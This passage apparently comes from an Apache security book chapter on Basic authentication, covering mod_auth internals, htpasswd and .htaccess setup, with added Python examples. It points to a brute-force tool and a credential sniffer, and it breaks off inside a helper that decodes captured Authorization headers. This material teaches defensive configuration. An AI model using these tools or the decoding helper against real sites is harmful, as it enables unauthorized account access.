use fully qualified URLs, like this: 


http://www.ourcompany.net:8080/index.html 


This URL contains all possible variables: 

• The protocol (http) 
• The server’s base address (www.ourcompany.net) 
• The port that httpd is listening on (8080) 
• The directory path (/) 
• The desired document (index.html) 


Few Webmasters (amateur or professional) take the time to construct URLs this way. 
Instead, they’re more apt to do something like this: 


http://www.ourcompany.net/ 


As you can see, some key variables are missing. This initially doesn’t seem 
problematic because your Web host will undoubtedly sort it out. After receiving the 
connection request, it will find httpd, which in turn will call the Web server’s / directory. 


By default, your Web server looks for a file named index.html in the requested direc- 
tory. With directory indexing, if the Web server cannot find index.html, it sends a 
directory listing instead. This is a list of all files, links, and directories in the target 
directory. 


This is undesirable because remote users can browse your file list. Therefore, unless 
you’re hosting an archive where you intend to provide file browsing, do not enable 
directory listing. 


WARNING 


If you do enable the directory listing option, ensure that your directories do not contain 
sensitive files. (Example: access control lists, configuration files, or databases, such as 
.htpasswd and .htaccess. See Chapter 11 for more information on these files.) 





Virtual Hosts and Network Access Control 


To restrict access on a per-virtual host or per-directory basis, you must establish two 
block components. First, the virtual host entry: 


<VirtualHost 4.40.49.220> 
    ServerAdmin david@jellingspot.com 
    DocumentRoot /home/jelly/public_html 
    ServerName www.jellingspot.com 
    ErrorLog logs/jellingspot.com-error_log 
    CustomLog logs/jellingspot.com-access_log common 
</VirtualHost> 


Next, simply apply your access rules in a directory block that operates on the speci- 
fied directory: 


SetEnvIf User-Agent *Opera.* agentok 
<Directory /home/jelly/public_html/> 
    Options Indexes MultiViews IncludesNoExec ExecCGI 
    AllowOverride All 
    Order allow,deny 
    Allow from env=agentok 
</Directory> 


Summary 


We've covered how to control user network access in a general way. This is useful to 
restrict access by incoming addresses, hostnames, and even environment variables. 
What remains is the extra layer of access control, where even if a user has 
authorization to connect, he must still authenticate himself to access even 
further-restricted resources within a directory he already has authorization to access. 
That’s what the next chapter is all about. 
Apache and Authentication: Who Goes There? 


Network access control is sometimes not enough. Often, you need more assurance 
than an IP address, hostname, or address mask can offer. You want a reasonable 
guarantee that humans coming from that address or host are really who they purport 
to be. For this, you use authentication. 


This chapter covers Apache’s authentication features. 


What Is Authentication? 


Authentication is the practice of challenging users to prove 
their identities. It is no more (or less) than asking someone 
to produce identification, examining that identification, 
and finally allowing or denying access based on your 
investigation’s results. 


You can instruct Apache to demand authentication in 
various ways: 


e Username/password matching against a plain-text 
ACL (access control list) 


e Username/password matching against a DB (Unix 
database hash) file 


e Username/password matching against a DBM (a Unix 
database format that handles key/value pairs very 
quickly) file 


e Username/password matching against a database 
e Digest-based authentication 


e Digital certificates 


IN THIS CHAPTER 


e What Is Authentication? 


e How Apache Handles Basic 
Authentication: Introducing 
mod_auth 


e htpasswd 


e Weaknesses in Basic HTTP 
Authentication 


e DBM-File—Based 
Authentication: Introducing 
mod_auth_dbm 


e HTTP and Cryptographic 
Authentication 


e SSL-Based Authentication 


e Other Tools for Extending 
Apache's Authentication 


e Holes in Apache 
Authentication: Historical 
Perspective 
To employ these methods, Apache uses various modules, including 

e mod_auth—Provides user authentication using plain text files 
e mod_auth_anon—Provides anonymous access to restricted areas 
e mod_auth_db—Provides authentication via Berkeley DB files 
e mod_auth_dbm—Provides user authentication via DBM files 
e mod_auth_digest—Provides MD5 Digest authentication 
e mod_auth_ldap—Provides user authentication via LDAP 


In this chapter, we'll focus chiefly on mod_auth and mod_auth_dbm. 


How Apache Handles Basic Authentication: Introducing 
mod_auth 


Unless you specify otherwise, Apache includes mod_auth and compiles it in by 
default. Apache achieves Basic authentication through mod_auth, which you'll find 
in httpd-release/modules/aaa as mod_auth.c. 


mod_auth.c, at least in Apache 2.0.28, consists of 338 lines before includes. In these 
338 lines, mod_auth establishes an authentication mechanism that offers user identi- 
fication by username/password pairs. It’s quick, clean, and fine for small ACLs. 


A Brief Tour of mod_auth 


mod_auth employs several functions, data type declarations, and structures that, 
taken together, do the work of asking for, examining, and either accepting or 
rejecting a user's credentials: 


e create_auth_dir_config() 
e command_rec auth_cmds[] 
e get_pw() 
e groups_for_user() 
e authenticate_basic_user() 
e check_user_access() 


It also relies on the core's ap_get_module_config() to fetch the per-directory 
settings that those directives produce. 
The Configuration Structure 
First, mod_auth sets up the password and group files and establishes a flag that indi- 
cates an authoritative versus nonauthoritative state: 


typedef struct { 
    char *auth_pwfile; 
    char *auth_grpfile; 
    int auth_authoritative; 
} auth_config_rec; 


mod_auth next calls create_auth_dir_config() and through this function establishes 
and returns an auth_config_rec called conf, sets both the password and group file 
pointers to NULL, and finally sets the authoritative flag to true (1): 


static void *create_auth_dir_config(apr_pool_t *p, char *d) 
{ 
    auth_config_rec *conf = apr_pcalloc(p, sizeof(*conf)); 
    conf->auth_pwfile = NULL; 
    conf->auth_grpfile = NULL; 
    conf->auth_authoritative = 1; 
    return conf; 
} 

Through these steps, create_auth_dir_config() sanitizes settings and prepares 
mod_auth for action. 


mod_auth next fills out a command_rec: 


static const command_rec auth_cmds[] = 
{ 
    AP_INIT_TAKE12("AuthUserFile", set_auth_slot, 
                   (void *) APR_XtOffsetOf(auth_config_rec, auth_pwfile), 
                   OR_AUTHCFG, 
                   "text file containing user IDs and passwords"), 
    AP_INIT_TAKE12("AuthGroupFile", set_auth_slot, 
                   (void *) APR_XtOffsetOf(auth_config_rec, auth_grpfile), 
                   OR_AUTHCFG, 
                   "text file containing group names and member user IDs"), 
    AP_INIT_FLAG("AuthAuthoritative", ap_set_flag_slot, 
                 (void *) APR_XtOffsetOf(auth_config_rec, auth_authoritative), 
                 OR_AUTHCFG, 
                 "Set to 'no' to allow access control to be passed along to lower " 
                 "modules if the UserID is not known to this module"), 
    {NULL} 
}; 


Next, mod_auth uses get_pw() to open the htpasswd file and fetch the stored 
(hashed) password for the user. Note the linear scan: every authentication reads 
the file from the top, and an unknown username reads all of it: 


static char *get_pw(request_rec *r, char *user, char *auth_pwfile) 
{ 
    ap_configfile_t *f; 
    char l[MAX_STRING_LEN]; 
    const char *rpw, *w; 
    apr_status_t status; 

    if ((status = ap_pcfg_openfile(&f, r->pool, auth_pwfile)) != APR_SUCCESS) { 
        ap_log_rerror(APLOG_MARK, APLOG_ERR, status, r, 
                      "Could not open password file: %s", auth_pwfile); 
        return NULL; 
    } 
    while (!(ap_cfg_getline(l, MAX_STRING_LEN, f))) { 
        if ((l[0] == '#') || (!l[0])) 
            continue; 
        rpw = l; 
        w = ap_getword(r->pool, &rpw, ':'); 

        if (!strcmp(user, w)) { 
            ap_cfg_closefile(f); 
            return ap_getword(r->pool, &rpw, ':'); 
        } 
    } 
    ap_cfg_closefile(f); 
    return NULL; 
} 

The next step is to ascertain what groups the incoming user belongs to. For this, 
mod_auth uses groups_for_user(): 
static apr_table_t *groups_for_user(apr_pool_t *p, char *user, char *grpfile) 
{ 
    ap_configfile_t *f; 
    apr_table_t *grps = apr_table_make(p, 15); 
    apr_pool_t *sp; 
    char l[MAX_STRING_LEN]; 
    const char *group_name, *ll, *w; 
    apr_status_t status; 

    if ((status = ap_pcfg_openfile(&f, p, grpfile)) != APR_SUCCESS) { 
        /*add? aplog_error(APLOG_MARK, APLOG_ERR, NULL, 
                    "Could not open group file: %s", grpfile);*/ 
        return NULL; 
    } 

    apr_pool_create(&sp, p); 

    while (!(ap_cfg_getline(l, MAX_STRING_LEN, f))) { 
        if ((l[0] == '#') || (!l[0])) 
            continue; 
        ll = l; 
        apr_pool_clear(sp); 

        group_name = ap_getword(sp, &ll, ':'); 

        while (ll[0]) { 
            w = ap_getword_conf(sp, &ll); 
            if (!strcmp(w, user)) { 
                apr_table_setn(grps, apr_pstrdup(p, group_name), "in"); 
                break; 
            } 
        } 
    } 
    ap_cfg_closefile(f); 

    apr_pool_destroy(sp); 
    return grps; 
} 
If mod_auth can open the file and get the password and groups, it tries to authenti- 
cate the incoming user: 


static int authenticate_basic_user(request_rec *r) 
{ 
    auth_config_rec *conf = ap_get_module_config(r->per_dir_config, 
                                                 &auth_module); 
    const char *sent_pw; 
    char *real_pw; 
    apr_status_t invalid_pw; 
    int res; 

    if ((res = ap_get_basic_auth_pw(r, &sent_pw))) 
        return res; 

    if (!conf->auth_pwfile) 
        return DECLINED; 
    if (!(real_pw = get_pw(r, r->user, conf->auth_pwfile))) { 
        if (!(conf->auth_authoritative)) 
            return DECLINED; 
        ap_log_rerror(APLOG_MARK, APLOG_NOERRNO|APLOG_ERR, 0, r, 
                      "user %s not found: %s", r->user, r->uri); 
        ap_note_basic_auth_failure(r); 
        return HTTP_UNAUTHORIZED; 
    } 
    invalid_pw = apr_password_validate(sent_pw, real_pw); 
    if (invalid_pw != APR_SUCCESS) { 
        ap_log_rerror(APLOG_MARK, APLOG_NOERRNO|APLOG_ERR, 0, r, 
                      "user %s: authentication failure for \"%s\": " 
                      "Password Mismatch", 
                      r->user, r->uri); 
        ap_note_basic_auth_failure(r); 
        return HTTP_UNAUTHORIZED; 
    } 
    return OK; 
} 


And finally, it checks for a Require specification: 


static int check_user_access(request_rec *r) 
{ 
    auth_config_rec *conf = ap_get_module_config(r->per_dir_config, 
                                                 &auth_module); 
    char *user = r->user; 
    int m = r->method_number; 
    int method_restricted = 0; 
    register int x; 
    const char *t, *w; 
    apr_table_t *grpstatus; 
    const apr_array_header_t *reqs_arr = ap_requires(r); 
    require_line *reqs; 

    /* BUG FIX: tadc, 11-Nov-1995.  If there is no "requires" directive, 
     * then any user will do. 
     */ 
    if (!reqs_arr) 
        return (OK); 
    reqs = (require_line *) reqs_arr->elts; 

    if (conf->auth_grpfile) 
        grpstatus = groups_for_user(r->pool, user, conf->auth_grpfile); 
    else 
        grpstatus = NULL; 

    for (x = 0; x < reqs_arr->nelts; x++) { 

        if (!(reqs[x].method_mask & (AP_METHOD_BIT << m))) 
            continue; 

        method_restricted = 1; 

        t = reqs[x].requirement; 
        w = ap_getword_white(r->pool, &t); 
        if (!strcmp(w, "valid-user")) 
            return OK; 
        if (!strcmp(w, "user")) { 
            while (t[0]) { 
                w = ap_getword_conf(r->pool, &t); 
                if (!strcmp(user, w)) 
                    return OK; 
            } 
        } 
        else if (!strcmp(w, "group")) { 
            if (!grpstatus) 
                return DECLINED;        /* DBM group?  Something else? */ 

            while (t[0]) { 
                w = ap_getword_conf(r->pool, &t); 
                if (apr_table_get(grpstatus, w)) 
                    return OK; 
            } 
        } 
        else if (conf->auth_authoritative) { 
            /* if we aren't authoritative, any require directive could be 
             * valid even if we don't grok it.  However, if we are 
             * authoritative, we can warn the user they did something wrong. 
             * That something could be a missing "AuthAuthoritative off", but 
             * more likely is a typo in the require directive. 
             */ 
            ap_log_rerror(APLOG_MARK, APLOG_NOERRNO|APLOG_ERR, 0, r, 
                          "access to %s failed, reason: unknown require directive:" 
                          "\"%s\"", r->uri, reqs[x].requirement); 
        } 
    } 

    if (!method_restricted) 
        return OK; 

    if (!(conf->auth_authoritative)) 
        return DECLINED; 

    ap_log_rerror(APLOG_MARK, APLOG_NOERRNO|APLOG_ERR, 0, r, 
                  "access to %s failed, reason: user %s not allowed access", 
                  r->uri, user); 

    ap_note_basic_auth_failure(r); 
    return HTTP_UNAUTHORIZED; 
} 


Through these methods mod_auth handles the access controls you instituted with the 
htpasswd system. 
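The decision logic of the functions above, rewritten in Python as an added illustration. This is not code from mod_auth.c or from the book; it reads the same file formats and returns the same three verdicts (OK, DECLINED, HTTP_UNAUTHORIZED). The sample .htpasswd and .htgroup contents are constructed here, the password validation handles only the {SHA} entry format that htpasswd -s writes, and the Limit method mask is ignored, so every require line is treated as applying to the request:

```python
import base64
import hashlib
import hmac

OK, DECLINED, HTTP_UNAUTHORIZED = "OK", "DECLINED", "HTTP_UNAUTHORIZED"


def sha_entry(password):
    """The {SHA} form htpasswd -s writes: base64 of the raw SHA-1 digest."""
    digest = hashlib.sha1(password.encode()).digest()
    return "{SHA}" + base64.b64encode(digest).decode()


# Constructed sample files (not from the book); lines follow the .htpasswd
# and .htgroup formats that mod_auth parses.
HTPASSWD_TEXT = "\n".join([
    "# comment and blank lines are skipped, as in get_pw()",
    "",
    "nicole:" + sha_entry("n1c0le-pw"),
    "larry:" + sha_entry("stooge1"),
    "moe:" + sha_entry("stooge2"),
])
HTGROUP_TEXT = "stooges: larry moe curly\nreports: larry moe\n"


def get_pw(user, pwfile_text):
    """Port of get_pw(): linear scan, first matching username wins."""
    for line in pwfile_text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _, rest = line.partition(":")
        if name == user:
            return rest.split(":", 1)[0]  # second ap_getword(): stop at next ':'
    return None


def groups_for_user(user, grpfile_text):
    """Port of groups_for_user(): the set of groups whose member list names user."""
    groups = set()
    for line in grpfile_text.splitlines():
        if not line or line.startswith("#"):
            continue
        group, _, members = line.partition(":")
        if user in members.split():
            groups.add(group)
    return groups


def password_validate(sent_pw, real_pw):
    """Stand-in for apr_password_validate(); only {SHA} entries are handled here."""
    if not real_pw.startswith("{SHA}"):
        raise ValueError("this example validates {SHA} entries only")
    return hmac.compare_digest(sha_entry(sent_pw), real_pw)


def authenticate_basic_user(user, sent_pw, pwfile_text, authoritative=True):
    """Port of authenticate_basic_user(): unknown user or bad password -> 401,
    unless AuthAuthoritative off lets a later module have a try (DECLINED)."""
    real_pw = get_pw(user, pwfile_text)
    if real_pw is None:
        return DECLINED if not authoritative else HTTP_UNAUTHORIZED
    return OK if password_validate(sent_pw, real_pw) else HTTP_UNAUTHORIZED


def check_user_access(user, requires, grpfile_text=None, authoritative=True):
    """Port of check_user_access() for the require lines that apply to the request."""
    if not requires:                      # no require directive: any user will do
        return OK
    groups = groups_for_user(user, grpfile_text) if grpfile_text else None
    for req in requires:
        kind, *args = req.split()
        if kind == "valid-user":
            return OK
        if kind == "user" and user in args:
            return OK
        if kind == "group":
            if groups is None:            # no AuthGroupFile: "DBM group? Something else?"
                return DECLINED
            if any(g in groups for g in args):
                return OK
        # an unknown keyword is logged by mod_auth but never grants access
    return DECLINED if not authoritative else HTTP_UNAUTHORIZED


def handle_request(user, sent_pw, requires, pwfile_text=HTPASSWD_TEXT,
                   grpfile_text=HTGROUP_TEXT, authoritative=True):
    """Authentication first, then authorization, as Apache runs the two hooks."""
    verdict = authenticate_basic_user(user, sent_pw, pwfile_text, authoritative)
    if verdict != OK:
        return verdict
    return check_user_access(user, requires, grpfile_text, authoritative)
```

handle_request("moe", "stooge2", ["group reports"]) returns OK, while the same credentials against ["group stooges"] for nicole return HTTP_UNAUTHORIZED because she is in no group; with no AuthGroupFile at all a group requirement yields DECLINED, exactly the "DBM group? Something else?" branch in the C source.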
The prevailing tool for password protecting Web directories is Rob McCool's 
htpasswd, which generally ships with Apache. The htpasswd system offers access 
control at the user and group levels via three configuration files. Each file fulfills a 
different function in the authentication process: 


e .htpasswd—.htpasswd is the password database. It stores username and pass- 
word pairs. (.htpasswd vaguely resembles /etc/passwd in this respect.) When 
users request access to the protected Web directory, the server prompts them 
for a username and password. The server then compares these user-supplied 
values to those stored in .htpasswd. .htpasswd is mandatory. 


e .htgroup—.htgroup is the htpasswd groups file. It stores group membership 
information (and in this respect, vaguely resembles /etc/group). .htgroup is 
optional; you only need it if you implement group access control. 


e .htaccess—.htaccess is the per-directory access file. It stores access rules (allow, 
deny), the location of the password and group files, the authentication method, 
and so on. Apache honors it only where AllowOverride permits (AuthConfig and 
Limit for the directives used in this chapter). You can instead put the same 
directives in a <Directory> block in httpd.conf, which is both faster and harder 
to tamper with, since nobody with write access to the Web tree can change them. 


NOTE 


Note that you needn't name these files .htaccess, .htpasswd, or .htgroup. These are merely 
their traditional names (.htaccess is set by AccessFileName), and some administrators prefer 
less predictable ones. If you do rename the password or group files, remember that Apache's 
stock configuration blocks Web access to files whose names begin with .ht and nothing else; 
a password file called users.txt inside DocumentRoot is downloadable unless you add a 
matching <Files> block or, better, keep it outside the Web tree altogether. 





Table 11.1 summarizes htpasswd's syntax. 


TABLE 11.1 htpasswd Options 


Option        Description 


-b            Batch mode: htpasswd takes the password from the command line instead 
              of prompting for it. Don't use this except in internal scripts that you 
              use once, watch closely, and then discard. The password appears in plain 
              text on the command line, in your shell history, and in the process list 
              (ps) while htpasswd runs. 

-c            Creates a new password file. Be careful when you use this; it overwrites 
              any existing file of that name, users and all. 

-d            Use crypt(). This is basically for non-Windows platforms; on Windows, use 
              MD5 instead (see -m, and also Chapter 16). crypt() silently uses only the 
              first eight characters of the password, so prefer -m wherever you can. 

-m            Use MD5 (Apache's own salted $apr1$ format). This offers multiplatform 
              password support (Windows, Unix, BeOS, and so on) and works only with 
              Apache 1.3.9 or later. 

-n            Display the result on STDOUT instead of updating the file. Consider this 
              a test. 

-p            Use plain text (Windows and TPF only). 

-s            Use SHA (the Secure Hash Algorithm, see 
              http://www.itl.nist.gov/fipspubs/fip180-1.htm). This provides migration 
              from or to Netscape servers (LDAP). The {SHA} format is unsalted, so two 
              users with the same password get identical entries. 

passwdfile    The password file's name (the one -c creates, or an existing one to 
              update). 





Setting Up Simple User-Based HTTP Authentication 


In this example, we’ll password-protect Web directories belonging to a user named 
Nicole (located in and beneath /home/Nicole/public_htm1). Because group authenti- 
cation is not involved, we only need two steps: 


e Create a new .htpasswd database 


e Create a new .htaccess file 


Creating a New .htpasswd Database 
To create a new .htpasswd password database, issue the htpasswd command plus the 
-c switch, the password filename, and the username, like this: 


$ /usr/sbin/htpasswd -c .htpasswd nicole 


NOTE 


Depending on your installation, you might find htpasswd utility in different directories. Two 
common locations are /home/httpd/bin and /usr/sbin. 


The previous command tells htpasswd to create a new htpasswd database (. htpasswd) 
with a user entry for user nicole. In response, htpasswd will prompt you for the new 
user’s password: 


Adding password for nicole. 

New password: 

Finally, when you enter the new password, htpasswd will prompt you to confirm it: 
Re-type new password: 

If the two passwords match, htpasswd will commit this information to .htpasswd, a 
plain-text file with two colon-delimited fields, the username and the hashed 
password (here in the traditional crypt() form, which uses only the first eight 
characters of the password): 


nicole:fG7Gk0K2Isa6s 
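To see exactly what htpasswd writes, here is an added Python implementation of two of its entry formats: the salted $apr1$ MD5 scheme behind -m and the unsalted {SHA} scheme behind -s. It is example code written for this section, not part of htpasswd or of the book; the usernames and passwords are constructed. crypt()-style entries such as nicole's above are left to the platform's crypt(3) and are neither generated nor verified here:

```python
import base64
import hashlib
import hmac
import secrets

# Alphabet used for both the salt and the hash encoding ("to64" in apr_md5.c).
ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value, count):
    """Emit `count` six-bit groups of `value`, least significant first."""
    out = bytearray()
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return bytes(out)


def apr1_md5(password, salt):
    """Apache's $apr1$ scheme (htpasswd -m): the md5crypt construction with a
    different magic string. Salt is at most 8 bytes drawn from ITOA64."""
    magic = b"$apr1$"
    salt = salt[:8]
    ctx = hashlib.md5(password + magic + salt)
    alt = hashlib.md5(password + salt + password).digest()
    remaining = len(password)
    while remaining > 0:                      # mix in alt, one block per 16 password bytes
        ctx.update(alt[:min(16, remaining)])
        remaining -= 16
    bit = len(password)
    while bit:                                # the length-dependent step
        ctx.update(b"\0" if bit & 1 else password[:1])
        bit >>= 1
    final = ctx.digest()
    for i in range(1000):                     # stretching: 1000 dependent MD5 rounds
        ctx1 = hashlib.md5()
        ctx1.update(password if i & 1 else final)
        if i % 3:
            ctx1.update(salt)
        if i % 7:
            ctx1.update(password)
        ctx1.update(final if i & 1 else password)
        final = ctx1.digest()
    triples = [(0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)]
    encoded = b"".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
                       for a, b, c in triples)
    encoded += _to64(final[11], 2)
    return (magic + salt + b"$" + encoded).decode()


def md5_entry(password, salt=None):
    """Password field as htpasswd -m writes it; a fresh 8-character salt each time."""
    if salt is None:
        salt = bytes(secrets.choice(ITOA64) for _ in range(8))
    return apr1_md5(password.encode(), salt)


def sha_entry(password):
    """Password field as htpasswd -s writes it: base64(SHA-1(password)), unsalted,
    so two users with the same password get identical entries."""
    return "{SHA}" + base64.b64encode(hashlib.sha1(password.encode()).digest()).decode()


def htpasswd_line(user, password, scheme="md5"):
    """One .htpasswd line. The username may not contain ':' (the field separator)."""
    if ":" in user:
        raise ValueError("username may not contain ':'")
    if scheme == "md5":
        return f"{user}:{md5_entry(password)}"
    if scheme == "sha":
        return f"{user}:{sha_entry(password)}"
    raise ValueError("unsupported scheme (crypt() entries are left to the platform)")


def verify(line, user, password):
    """Check a stored line the way the server does: re-hash with the stored salt,
    then compare in constant time."""
    name, _, stored = line.partition(":")
    if name != user:
        return False
    if stored.startswith("$apr1$"):
        salt = stored.split("$")[2].encode()
        return hmac.compare_digest(apr1_md5(password.encode(), salt), stored)
    if stored.startswith("{SHA}"):
        return hmac.compare_digest(sha_entry(password), stored)
    return False   # crypt()-style entries such as nicole's need crypt(3); not handled here
```

Two points the code makes concrete: an $apr1$ entry is always 37 characters (magic, 8-character salt, separator, 22 encoded characters), and because the salt is stored in the entry, verifying means re-running the whole 1000-round construction with that salt rather than decrypting anything.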
This new file (.htpasswd) is your password database. The next step is to create your 
.htaccess file. 


Creating a New .htaccess File 
The .htaccess file stores your access rules and various configuration information. To 
create it, you can use any plain-text editor. 


Here’s the . htaccess file for Nicole’s Web directory: 


AuthUserFile /home/Nicole/public_html/.htpasswd 
AuthGroupFile /dev/null 
AuthName Nicole 
AuthType Basic 


<Limit GET POST> 
require user nicole 
</Limit> 


The file consists of five main directives and their corresponding values: 


e AuthUserFile—The AuthUserFile directive points to the location of the 
.htpasswd database. Note that when you set AuthUserFile, you must specify 
the full file-system path to .htpasswd. (For instance, in the previous example, the 
path is /home/Nicole/public_html, not /~Nicole/public_html, which is a URL path 
the server would not resolve here.) 


e AuthGroupFile—The AuthGroupFile directive points to the location of your 
group access file (normally .htgroup). In this first example, a group file wasn’t 
necessary, so the AuthGroupFile directive value was set to /dev/null. 


e AuthName—The AuthName directive stores a user-defined text string to display 
when the authentication dialog box appears. (When users request access, 
they’re confronted by a username/password prompt. The caption requests that 
they Enter username for AuthName at hostname. Although the server fills in 
the hostname variable, you must specify the AuthName variable’s value. If you 
leave it blank, the dialog will display a message like Enter username for 
at www.myhost.net.) 


e AuthType—The AuthType directive identifies the authentication method. In the 
previous example, I specified Basic authentication, the most commonly used 
type. Note that although Basic authentication provides effective password 
protection, it does not protect against eavesdropping: in Basic authentication 
the browser sends username:password base64-encoded in the Authorization 
header, and base64 is an encoding anyone can reverse, not encryption. This 
topic will be discussed more later. 


e Limit—The Limit directive restricts the enclosed rules to the HTTP methods you 
list (for example, GET, PUT, and POST). Methods you don't list are not covered: 
with <Limit GET POST>, a request that uses PUT, DELETE, or any other method 
bypasses the require directive entirely. Unless you truly mean to protect only 
certain methods, put require directly in the .htaccess file (or inside 
<LimitExcept>) so that it applies to every method. 
The Limit directive's four internal directives offer refined access control. They are 


e require—The require directive specifies which users or groups can access the 
password-protected directory. Valid choices are explicitly named users, explic- 
itly named user groups, or any valid user who appears in .htpasswd. In the 
previous example file, I used the require directive to limit access to user 
nicole (require user nicole). 


e allow—The allow directive controls which hosts can access the password- 
protected directory. The syntax is allow from host1 host2 host3, and you 
can specify these hosts by hostname, IP address, or partial IP addresses. 


e deny—The deny directive specifies which hosts are prohibited from accessing 
the password-protected directory. The syntax is deny from host1 host2 host3. 
Here, too, you can specify hosts by their fully qualified hostnames, IP 
addresses, or partial IP addresses. 


e order—The order directive controls the order in which the server will evaluate 
access rules. The syntax is deny,allow (deny rules are processed first, and a host 
that matches neither list is allowed) or allow,deny (allow rules are processed 
first, and a host that matches neither list is denied). 


If you look at the sample file again, it will now make more sense: 


AuthUserFile /home/Nicole/public_html/.htpasswd 
AuthGroupFile /dev/null 
AuthName Nicole 
AuthType Basic 


<Limit GET POST> 
require user nicole 
</Limit> 


NOTE 


Although the examples in this chapter keep .htpasswd in Nicole's public_html for 
simplicity, don't place password or group files in any Web-reachable directory hierarchy 
on a production server. Instead, store them elsewhere in the file system, where Web 
requests cannot reach them, and point AuthUserFile and AuthGroupFile at that location 
with full paths. 


The file specifies that no group access is allowed, that the authentication is type 
Basic, and that only user nicole’s login and password will be accepted for compari- 
son with the password database’s values. 


When users connect to Nicole's site, the server reads .htaccess, sees that the 
directory requires authentication, and answers with a 401 response carrying a 
WWW-Authenticate challenge (with the AuthName as its realm). In response, the Web 
browser displays a password dialog box and, once the user fills it in, repeats the 
request with an Authorization header. If the user supplies an incorrect username or 
password, the server rejects the attempt with another 401, and the browser offers 
the user another opportunity. 


NOTE 


Two different failures can occur here. If the username is unknown or the password doesn't 
match, Apache logs the failure, re-issues the WWW-Authenticate challenge, and returns 
HTTP_UNAUTHORIZED (401). If Apache cannot make the decision at all, for instance because the 
configuration is incomplete (no AuthName, say), ap_get_basic_auth_pw() returns 
HTTP_INTERNAL_SERVER_ERROR (500) instead, and error_log tells you why. (A module configured 
as nonauthoritative returns DECLINED so that another authentication module can try.) The 
familiar "three tries" behaviour belongs to the browser, which stops re-prompting after a few 
401s; Apache itself places no limit on attempts, a point we'll return to under "Weaknesses in 
Basic HTTP Authentication." 


This method is quite effective for password protecting a single directory hierarchy for 
a single user. Now, let’s address group access. 


Setting Up Simple Group-Based HTTP Authentication 


Setting up group authentication is only slightly more complicated. For this, you 
must create a .htgroup file. In this example, let’s stick with Nicole’s site (located in 
/home/Nicole/public_html1/). 


Let’s assume that you want to grant users larry, moe, and curly access to Nicole’s 
site. First, you need to designate a group, which we'll fittingly call stooges. Here’s a 
corresponding .htgroup file: 


stooges: larry moe curly 


The file is broken into two fields. The first identifies the group, and the second holds 
your user list. After you've created .htgroup, you must edit .htaccess and specify 
.htgroup's location: 


AuthUserFile /home/Nicole/public_html/.htpasswd 
AuthGroupFile /home/Nicole/public_html/.htgroup 
AuthName Nicole 
AuthType Basic 


<Limit GET POST> 
require user nicole 
</Limit> 


And finally, you must specify access rules for group stooges: 


AuthUserFile /home/Nicole/public_html/.htpasswd 
AuthGroupFile /home/Nicole/public_html/.htgroup 
AuthName Nicole 
AuthType Basic 


<Limit GET POST> 
require group stooges 
</Limit> 


When should you use group-based authentication? Here’s an example on a micro- 
scopic scale: Suppose you password-protect /public_html and allow users larry, moe, 
and curly to access it. Suppose further that beneath /public_htm1, you create a 
special directory named /reports, and you want to restrict access to larry and moe 
only. You could create two groups, as depicted in Figure 11.1. 


[Figure 11.1: Group A (larry, moe, curly) is granted /public_html; Group B (larry, moe) 
is granted /public_html/reports.] 


FIGURE 11.1 Two groups with some users shared, and some users not shared. 


All members of Group A and Group B can access /public_html. However, only larry 
and moe (from Group B) can access /public_html/reports. 


In reality, of course, if you were dealing with only three users you could create new 
.htpasswd and .htaccess files in /public_html/reports and allow any valid user 
appearing in /public_html/reports/.htpasswd (larry or moe or both). However, 
when you have several hundred users and multiple directories and subdirectories to 
restrict, group-based authentication is quite convenient. 


Weaknesses in Basic HTTP Authentication 


Basic HTTP authentication is a great quick fix for password-protecting Web directo- 
ries, but it does have weaknesses: 


e htpasswd protects against strictly outside approaches. It does not protect local 
Web directories from local users who can access such directories directly (via 
the file system or through other services) without using a Web client. 


e The htpasswd system by default provides no password lockout mechanism, and 
therefore invites sustained, reiterative, or brute-force attacks. Attackers can try 
as many usernames and passwords as they want. To try a brute-force attack, get 
BeastMaster’s brute_web, located here: 
http://www.wi26@0.org/mediawhore/nf0/defcon_archive/WWW/BRUTE_WEB.C. 
(Note that brute_web requires a dictionary file.) 
Also, basic HTTP authentication methods are well known. Therefore, when employ- 
ing HTTP authentication on public Web hosts, I strongly recommend that you do 
not store .htpasswd files in the directories they protect. If you do, anyone who can 
fetch the file (an authenticated user, or an outsider if the <Files> protection for 
.ht* names is missing or the file has been renamed) can download it and run 
password-cracking tools against it offline, with no lockout and no log entries on 
your server. (This is the Web equivalent of someone grabbing /etc/passwd.) 


Basic HTTP authentication's greatest weakness by far is that passwords are sent 
encoded, not encrypted: the Authorization header carries username:password in 
base64, which any observer can reverse. Hence, attackers who can sniff the network 
between browser and server capture working credentials, and only running the site 
over SSL (covered later in this chapter) closes that hole. 


NOTE 


To sniff your own HTTP authentication traffic, get web_sniff (by BeastMaster V from 
Rootshell). web_sniff was specifically designed to capture and decode basic HTTP 
authentication passwords on the fly. Find it here: http://upzine.8m.com/web_sniff.c. 
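Here is that eavesdropping risk made concrete, as an added example rather than anything from the book or from web_sniff: the challenge Apache sends for Nicole's realm, the Authorization header the browser returns, and the few lines a passive observer needs to turn a captured request back into a username and password. The hostname, paths, and credentials are constructed for the example.

```python
import base64

# Constructed sample of Apache's side of the exchange for Nicole's realm.
CHALLENGE = (
    "HTTP/1.1 401 Authorization Required\r\n"
    'WWW-Authenticate: Basic realm="Nicole"\r\n'
    "Content-Type: text/html\r\n"
    "\r\n"
)


def realm_from_challenge(response):
    """The realm the browser shows in its dialog, parsed from WWW-Authenticate."""
    for line in response.split("\r\n"):
        if line.lower().startswith("www-authenticate:"):
            _, _, params = line.partition("Basic")
            for param in params.split(","):
                key, _, value = param.strip().partition("=")
                if key.lower() == "realm":
                    return value.strip('"')
    return None


def build_authorization(user, password):
    """What the browser sends back: 'Basic' plus base64(user:password)."""
    token = base64.b64encode(f"{user}:{password}".encode("latin-1")).decode()
    return f"Authorization: Basic {token}"


def client_request(user, password, path="/private/"):
    """The browser's retry of the original request, now carrying credentials."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        "Host: www.myhost.net\r\n"
        f"{build_authorization(user, password)}\r\n"
        "\r\n"
    )


def sniff_credentials(raw_request):
    """What a passive observer recovers from one captured request: no key, no
    cracking, only a base64 decode. Returns (user, password) or None."""
    for line in raw_request.decode("latin-1").split("\r\n"):
        if line.lower().startswith("authorization: basic "):
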